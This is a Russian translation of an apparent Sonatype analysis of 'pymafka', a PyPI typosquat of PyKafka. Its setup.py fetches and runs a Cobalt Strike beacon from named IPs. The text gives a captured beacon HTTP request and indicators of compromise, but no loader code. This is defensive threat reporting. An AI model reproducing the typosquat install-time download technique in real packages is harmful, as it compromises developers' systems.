На этой неделе автоматические боты Sonatype по обнаружению вредоносных программ обнаружили вредоносный пакет Python 'pymafka' в реестре PyPI.
Pymafka
Судя по всему, пакет является опечаткой легитимной популярной библиотеки PyKafka, удобного для программистов клиента Apache Kafka для Python. Эта разработка последовала за обнаруженным нами ранее в этом месяце другим опечаткой, направленной на проект Apache Kafka.
PyKafka включает в себя Python-реализации производителей и потребителей Kafka, и был извлечен более 4 240 305 раз как пользовательскими загрузками, так и зеркалами/ботами. Для сравнения, вредоносный 'pymafka' показал количество загрузок около 300, так как Sonatype своевременно сообщила об этом в PyPI.
17 мая в реестре PyPI появился загадочный пакет 'pymafka'. Вскоре пакет был отмечен автоматическими средствами обнаружения вредоносного ПО платформы Sonatype Nexus.
Пакет 'pymafka' может показаться идентичным популярному PyKafka, но его внутренности показывают совсем другую историю.
Python-скрипт 'setup.py' внутри 'pymafka' сначала определяет вашу платформу. В зависимости от того, используете ли вы Windows, macOS или Linux, загружается соответствующий вредоносный троян и запускается на зараженной системе.
Троян, о котором идет речь, - это маяк Cobalt Strike (CS). Cobalt Strike - это программное средство для пен-тестирования, обычно используемое "красными командами" и этичными хакерами для имитации реальных кибератак, особенно во время оценки безопасности.
Интересно, что, на системах Windows скрипт Python пытается сбросить маячок Cobalt Strike на 'C:\Users\Public\iexplorer.exe'. Обратите внимание, что это неправильное написание выделяется, поскольку легитимный процесс Microsoft Internet Explorer обычно называется "iexplore.exe" (без 'r' в конце) и не присутствует в каталоге C:\Users\Public.
Загружаемые вредоносные исполняемые файлы - 'win.exe' и 'MacOS' , названия которых соответствуют их целевым операционным системам. Оба они загружаются с IP-адреса 141.164.58.147, предоставленного провайдером облачного хостинга Vultr.
Эти исполняемые файлы пытаются связаться с китайским IP 39.106.227.92, который закреплен за компанией Alisoft (Alibaba).
Менее трети антивирусных систем определили эти образцы как вредоносные на момент отправки в VirusTotal.
На Windows полезная нагрузка также постоянно исследовала конечную точку '/updates.rss' и отправляла зашифрованные значения cookie в запросах, что соответствует поведению маячков Cobalt Strike.
GET /updates.rss HTTP/1.1
Accept: */*
Cookie: mZoD7LYrA/...
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; LG; LG-E906)Host: 39.106.227.92:8445
Connection: Keep-Alive
Cache-Control: no-cacheДля систем Linux скрипт Python пытается загрузить и запустить исполняемый файл "env" с IP-адреса 39.107.154.72 (также принадлежащего Alibaba), который на момент анализа был отключен.
Sonatype сообщили об этих находках в реестр PyPI вскоре после обнаружения и анализа пакета вредоносный пакет был удален, едва достигнув ~300 загрузок.
Indicators of Compromise
IPv4
- 141.164.58.147
- 39.106.227.92
- 39.107.154.72
MD5
SHA1
- d4059aeab42669b0824757ed85c019cd5036ffc4
- 85d0d7acd844f053eb8fbece9fff98e16976b200
- c41e5b1cad6c38c7aed504630a961e8c14bf4ba4
SHA256
- 137edba65b32868fbf557c07469888e7104d44911cd589190f53f6900d1f3dfb
- b117f042fe9bac7c7d39eab98891c2465ef45612f5355beea8d3c4ebd0665b45
- 4de4f47b7f30ae31585636afd0d25416918d244fcc9dfe50967a47f68bb79ce1